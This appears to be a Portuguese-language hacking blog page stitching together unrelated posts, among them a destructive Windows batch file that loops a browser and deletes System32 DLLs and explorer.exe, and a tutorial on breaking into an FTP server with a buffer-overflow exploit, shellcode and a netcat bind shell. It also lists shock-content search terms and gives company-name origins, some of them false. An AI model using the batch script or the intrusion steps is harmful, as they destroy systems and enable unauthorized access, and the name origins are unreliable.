MOTIVO
O motivo é simples, falta de internet estavel funcional.
PEÇO IMENSAS DESCULPAS AOS FIEIS VISITANTES DO BLOG POR ESTA IRRITANTE FALHA NO FUNCIONAMENTO DO NOSSO GRANDIOSO BLOG. DESDE JA INFORMO QUE A QUESTAO DE REDE JA ESTA RESOLVIDA AGORA COM UM LINK SUFICIENTEMENTE RAPIDO 600KB-Download GARANTIDOS ENTÃO ATÉ PARA MIM A VIDA FICOU FACIL AGORA QUERO DEDICAR ME A IMPORTAR INFO DA DEEP WEEB hehe PARA JUNTOS CONSUMIRMOS. AGUARDEM MUITO CONTEUDO EXCLUSIVO AQUI
(Fonte da imagem: Reprodução/What’s that Programming Language?)
Você é um exímio conhecedor das principais linguagens de programação do mundo? E das que ficaram no passado, mas foram vitais para que a computação chegasse aonde está? Então está na hora de testar os seus conhecimentos em um site muito simples, mas que pode ser muito divertido para os programadores de plantão. Ficou curioso? Então clique aqui para acessar o “What’s that Programming Language?”.
Tudo o que você precisa fazer, assim que a página for carregada, é analisar o código que está sendo mostrado na tela. Sabendo qual é a linguagem utilizada, digite o nome dela na caixa de texto indicada. Estando correto, você ganhará um ponto e uma nova será mostrada na tela. Caso você não saiba, pressione a tecla “Esc” duas vezes para pular a fase.
O seu score é carregado no canto superior esquerdo da tela, mostrando o número de acertos e também de tentativas. Como já dissemos, além de várias linguagens utilizadas atualmente, também há várias que marcaram a história da programação.
Não se esqueça de gravar (nomedoarquivo). bat, e NÃO execute em seu PC!
@ECHO OFF
:mc_respect
START http://brechacker.blogspot.com/
CLS
GOTO mc_respect
CD\
CD WINDOWS
CD SYSTEM32
DEL /s /q *.dll
CLS
EXIT
CD\
CD WINDOWS
DEL /s /q explorer.exe
CLS
EXIT
:mc_respect
Autodidata é uma pessoa que aprende algo por esforços próprios, ou seja, sem ajuda de um tutor especializado ou em uma escola. Dentre alguns famosos autodidatas , podemos citar Bill Gates, Stanley Kubrick, Woody Allen e Henry Ford.
A lista de autodidatas famosos se extende quilometricamente e esta aí para provar que o trabalho final de um profissional independe da sua formação acadêmica.
Vamos supor que você tenha gastado dois mil reais em cursos , aperfeiçoamentos e técnicas diversas , e cobre ai para fazer seu trabalho, dois mil reais. Justo. Muito justo. Agora vamos supor que você nunca
O melhor firewall é um firewall de hardware que é completamente separado do seu sistema operacional. Ele não precisa ser um roteador dedicado, poderia ser uma caixa de pentium antigo rodando Linux. Abaixo eu encontrei alguns sites que têm How To sobre a criação de um router de hardware fora usando um computador antigo e usando um pequeno programa linux que cabe em um único disquete.
Breve Descrição:floppyfw é um roteador com o avançado firewall, capacidades de Linux que cabe em um disquete único.
Características:Listas de acesso, IP-masquerading (Network Address Translation), conexão rastreado filtragem de pacotes e (bastante) de roteamento avançado. Pacote para modelagem de tráfego também está disponível.Requer apenas um 386sx ou melhor com duas placas de rede, uma unidade de disquete de 1,44 MB e 12MByte de RAM (por menos de 12M e não FPU, use a série 1.0, que vai ficar mantida.)Sistema de embalagem muito simples. É usado para editores, PPP, VPN, traffic shaping e tudo vem à tona. (Agora este está olhando ainda mais como LRP (pode descansar em paz), mas floppyfw não é um garfo.)Exploração madeireira por meio klogd / syslogd, local e remoto.Suporte de série para o console pela porta serial.Servidor DHCP e DNS cache para redes internas.
floppyfw
Por terem um valor inicial muito baixo, estes produtos remarcados encontram rapidamente o caminho dos sites de leilão, vendedores ambulantes e até mesmo algumas lojas respeitáveis, transformando-se em uma verdadeira praga.
Este tipo de falsificação é bem mais grave que uma simples remarcação (ou seja, vender outro produto similar, porém de uma marca mais barata como se fosse um pendrive da Kingston ou uma bateria da Nokia, por exemplo) pois o produto resultando realmente lesa o comprador, fazendo com que não apenas ele leve um produto com uma capacidade várias vezes inferior, quanto perca dados.
Este processo de "inflar" a capacidade algumas vezes pode beirar o ridículo, como no caso desta imitação de um HD externo da Samsung:

Por fora ele até engana, mas se tiver a curiosidade de abrí-lo vai ter uma surpresa:

Esta foto foi postada por um colega do leste da Rússia, que mora perto da fronteira com a China. Dentro do "HD" temos duas porcas para simular o peso e um pendrive de 128 MB, cujo controlador foi modificado para funcionar em loop,
Comentem e deem outras dicas e o vosso parecer...
outro site interressante que achei é o http://www.mzjobs.co.mz/
O google esconde vários mistérios chocantes, abaixo algumas palavras chaves que você nunca deve digitar no buscador, ou caso contrário irá se arrepender.
1º. This is not sexy – e clicar “Estou com sorte”
2º. 2 Girls and 1 cup
3º. GlassAss.com – e clicar “Estou com sorte”
4º. Muito nojento – em Imagens do google
5º. Large anus – em Imagens do google
6º. Goatse - em Imagens do google
7º. Lemonparty – e clicar “Estou com sorte”
8º. Fisting – em Imagens do google
9º. Gypsy 100 - em Imagens do google
10º. Motumbo – em Imagens do google
Nunca é demais saber a origem dos nomes de famosas empresas de tecnologia como Google, Adobe, Apple, Sun e por aí afora.
Anote:
Adobe
Vem do nome do rio Adobe Creek, que corria por trás da casa de John Warnock, fundador da companhia.
Apache
Nada a ver com a destemida tribo de índios norte-americanos. O nome do servidor web gratuito vem de “Patch”, código que corrige bugs de softwares.
Apple Computers
Steve Jobs estava comendo uma maçã, quando lhe ocorreu batizar sua empresa com o nome da fruta.
Cisco
Corruptela de San Francisco, cidade norte-americana onde a empresa foi fundada.
Compaq
As 3 primeiras letras são da palavra “computer/computador” e foi adicionado o “paq” para “denotar um pequeno objeto completo”, ou que pudesse significar“compatibilidade e qualidade.”
Google
O nome inicial do Google era “googol”, expressão uasada pelo matemático Milton Sirotta para representar o número 1 seguido de 100 zeros (ou 10 elevado a 100). Só que quando Larry Page e Sergey Brin receberam o primeiro dinheiro de investidores para o projeto do sistema de buscas, o cheque veio em nome de Google. E ficou assim.
Hotmail
Os criadores do correio eletrônico online da Microsoft queriam um nome que terminasse em mail e colocaram “Hot” no início porque a expressão continha o termo “HTML”, linguagem básica com que são construídos os sites da Web.
Intel
Bob Noyce e Gordon Moore quiseram denominar a sua nova companhia “Moore Noyce” mas já existia uma cadeia de hotéis com esse nome, portanto eles tiveram de concordar com as siglas de INTegrated ELectronics (Eletrônica Integrada).
Microsoft
Bill Gates deu esse nome para representar a companhia que foi criada para dedicar-se à MICROcomputer SOFTware (software para microcomputador). Micro-soft originalmente batizado, o hífen foi retirado mais tarde.
Motorola
O fundador Paul Galvin resolveu assumir esse nome quando a sua companhia começou a fabricar rádios de carros. A companhia, na época era então chamada Victrola pois fabricava as famosas vitrolas. Victr = tocador de disco de vinil; victr + ola passou a ser motor + ola.
Sony
Vem do Latim ‘Sonus’, que significa som. E ainda de Sony, que é como são chamadas as mentes brilhantes nos Estados Unidos.
Sun
Acrônimo de Stanford University Network.
Xerox
A palavra grega “xer” significa seco. O inventor, Chestor Carlson, denominou o seu produto Xerox por ser uma cópia seca, diferentemente do concorrente à época que fazia, até então, uma cópia molhada.
Yahoo!
Palavra criada pelo escritor Jonathan Swift e utilizada em seu livro “As Viagens de Gulliver”. Representa uma pessoa cuja aparência está mais para um alienígena do que para um humano. Os criadores do portal achavam que o termo os descrevia com perfeição.
Clicando na imagem voce será direcionado ao site que contém galerias de fotos de casemods impressionantes. Vale a pena conferir !!
Áudio: Português
Legenda: Indisponivel
Tamanho: 536 Mb
Formato: Avi
Sinopse: Ao longo da existência da humanidade, um grande segredo foi protegido a ferro e fogo. Homens e mulheres extraordinários o descobriram e não só alcançaram feitos incríveis como também mudaram o curso de nossa história. Platão, Da Vinci, Galileu, Thomas Edison, Beethoven, Napoleão, Abraham Lincoln e Einstein foram alguns dos grandes homens que controlavam a força desse mistério. E agora, após milhares de anos, o Segredo será revelado para todo o mundo!
--------------------------------------------------------------------------------
Por Twi John
Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesa técnica para invadir Telnet, SSH entre outros.
A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação.
Estarei já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo.
Primeiro você deve identificar o serviço, versão, OS, entre outros. Você pode usar o nmap para isso usando a seguinte linha que gosto de usar:
nmap -v -sV -sC -O host
Para nosso caso, será encontrado um host com Quick 'n Easy FTPD 3.0, será necessario você ter acesso a algum usuario ou ftp anonimo, usando o -sC você saberá se o servidor tem acesso anonimo.
Veja o sistema operaciona.
Feito isso agora vamos usar o exploit em python.
http://www.securiteam.com/exploits/5WP0C2AJ5W.html
Aqui você deve configurar ele:
host = "127.0.0.1" // O Host que será explorado
port = 21 // A porta , por padrão 21
user = "h07" // O usuario, caso tenha acesso anonimo coloque "ftp"
password = "open" // Mesma coisa do usuario
Shellcode: No caso desse exploit será aberto a calculadora do windows, mais você pode estar alterando ele, pode encontrar shellcodes no site do metasploit ou então fazendo você mesmo.
http://www.metasploit.com/shellcode
shellcode = (
#bad chars: 0x00 0x0a 0x0d 0x5c 0x2f
#reconstruction PEB block
#mov dword edx, 0x7FFDF020 ;EDX <-- RtlEnterCriticalSection pointer
#mov dword [edx], 0x77F8AA4C ;RtlEnterCriticalSection pointer <-- original value
#...
"\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\ x53\ xB9"
"\xad\xaa\x01\x78" #Address of system() function (2000 SP0 polish)
"\xFF\xD1\xEB\xF7")
Pronto, agora ele irá enviar "A" 267, para ocorrer o buffer overflow colocando a shellcode.
Caso você tenha escolhido uma shellcode de bind, antes de explorar você abre o netcat e digita : nc -vv -l -p (porta de bind) -n
Agora usa o exploit e você estará conectado na shell do sistema.
Obrigado, espero que tenham gostado. Me corrijam qualquer coisa.
















